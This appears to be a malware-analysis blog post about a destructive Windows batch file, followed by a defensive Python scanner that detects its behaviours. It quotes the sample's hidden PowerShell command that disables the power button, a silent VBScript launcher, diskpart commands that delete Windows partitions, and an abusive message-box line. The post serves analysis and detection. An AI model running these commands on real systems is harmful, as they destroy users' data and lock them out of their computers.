A Simple Batch File That Blocks Computer Usage

January 6, 2022

The function BlockInput expects one parameter: TRUE or FALSE. When TRUE is passed, it blocks keyboard and mouse input events from reaching applications. From the user’s point of view, no interaction with the computer is possible until the API is called a second time with “FALSE”. Microsoft provides this API to prevent the user from performing actions while the computer executes sensitive operations.

The next one-liner reconfigures the way the power button works:

    powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"

powercfg.exe is a standard tool provided by Microsoft[2] that allows interaction with power schemes.

Then, the script drops two scripts on the target:

    set WshShell = wscript.createobject("WScript.shell")
    WshShell.run """C:\Windows\Temp\x.bat"" ", 0, true

The file x.bat is a long script that destroys the victim’s computer. Here are some pieces of code:

    :: deleting some Windows partitions
    echo Select Disk 0 >> y.txt
    echo Select Partition 2 >> y.txt
    echo Delete Partition Override >> y.txt
    echo Select Partition 4 >> y.txt
    echo Delete Partition Override >> y.txt
    diskpart /s y.txt >nul

Also possible:

    :: creating a message box
    echo msgbox"stupid b*tch",0 , "get rekt, ur PC has been f*cked" >> y.vbs

Calling BlockInput is a common anti-debugging technique implemented by malware to prevent the analyst from interacting with the debugger.
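For triaging similar samples, the Python below (an added example, not code from the original post or from the malware) statically scans batch text for the behaviours described above: a reference to BlockInput, the powercfg power-button change, and a diskpart /s call whose script file, rebuilt from the preceding echo redirections, contains destructive commands. The function name triage, the finding labels and the sample input are assumptions constructed for illustration.

```python
import re

# Constructed sample built from the fragments quoted in this post (not the full script).
SAMPLE = r'''@echo off
powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"
echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul
echo list volume > z.txt
diskpart /s z.txt
'''

ECHO = re.compile(r'^\s*echo\s+(.*?)\s*(>{1,2})\s*(\S+)\s*$', re.I)
DISKPART = re.compile(r'\bdiskpart(?:\.exe)?\s+/s\s+"?([^\s">]+)', re.I)
POWER_BUTTON = re.compile(
    r'\bpowercfg(?:\.exe)?\s+[-/]set(?:ac|dc)valueindex\s+\S+\s+sub_buttons\s+pbuttonaction\s+0\b', re.I)
DESTRUCTIVE = re.compile(r'^\s*(?:delete\s+(?:partition|volume|disk)|clean)\b', re.I)

def triage(script):
    """Statically scan batch text; return (line_no, finding) tuples in line order."""
    dropped = {}    # lower-cased file name -> lines the script has echoed into it
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        m = ECHO.match(line)
        if m:
            text, op, name = m.groups()
            if op == '>':                       # '>' truncates, '>>' appends
                dropped[name.lower()] = []
            dropped.setdefault(name.lower(), []).append(text)
            continue
        if re.search(r'\bBlockInput\b', line, re.I):
            findings.append((no, 'input-block'))
        if POWER_BUTTON.search(line):
            findings.append((no, 'power-button-reconfigured'))
        m = DISKPART.search(line)
        if m:
            # Judge the diskpart call by the script file rebuilt from earlier echo lines.
            body = dropped.get(m.group(1).lower(), [])
            if any(DESTRUCTIVE.match(cmd) for cmd in body):
                findings.append((no, 'destructive-diskpart'))
    return findings

if __name__ == '__main__':
    for no, finding in triage(SAMPLE):
        print(no, finding)
```

The second diskpart call in the sample is not flagged because its rebuilt script only lists volumes, which keeps benign diskpart automation from being flagged.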